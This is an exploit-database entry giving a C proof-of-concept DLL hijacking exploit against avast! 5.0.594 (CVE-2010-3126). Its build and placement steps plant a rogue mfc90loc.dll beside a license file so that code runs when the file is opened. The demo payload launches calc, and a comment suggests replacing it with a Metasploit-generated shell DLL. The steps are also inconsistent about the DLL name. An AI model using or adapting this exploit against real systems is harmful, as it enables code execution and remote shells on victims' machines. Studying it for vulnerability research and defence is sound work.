Avast! 5.0.594 - 'mfc90loc.dll' License Files DLL Hijacking

Author: diwr
type: local
platform: windows
port: 
date_added: 2010-08-25 
date_updated: 2019-03-07 
verified: 0 
codes: CVE-2010-3126;OSVDB-67481 
tags: 
aliases:  
screenshot_url:  
application_url: http://www.exploit-db.comsetup_av_free.exe

/*
# Exploit Title: avast! license files DLL Hijacking Exploit (mfc90loc.dll)
# Date: 25/08/2010
# Author: Bruno Filipe (diwr) http://digitalacropolis.us
# Software Link: http://www.avast.com
# Version: <= 5.0.594
# Tested on: WinXP SP2, WinXP SP3
# Thx TheLeader ;)
#
----------------------------------------------------------------------------------------------------------
# This should work with avast license files (.avastlic)
# 1. gcc dllmain.c -o mfc90loc.dll
# 2. Put mfc90ptb.dll in the same directory of an avast license file (EG:
anything.avastlic)
# 3. You can generate a msfpayload DLL and spawn a shell, for example.
#
----------------------------------------------------------------------------------------------------------
*/

#include <windows.h>

int main()
{
  WinExec("calc", SW_NORMAL);
  exit(0);
  return 0;
}

BOOL WINAPI DllMain(HINSTANCE hinstDLL,DWORD fdwReason, LPVOID lpvReserved)
{
  main();
  return 0;
}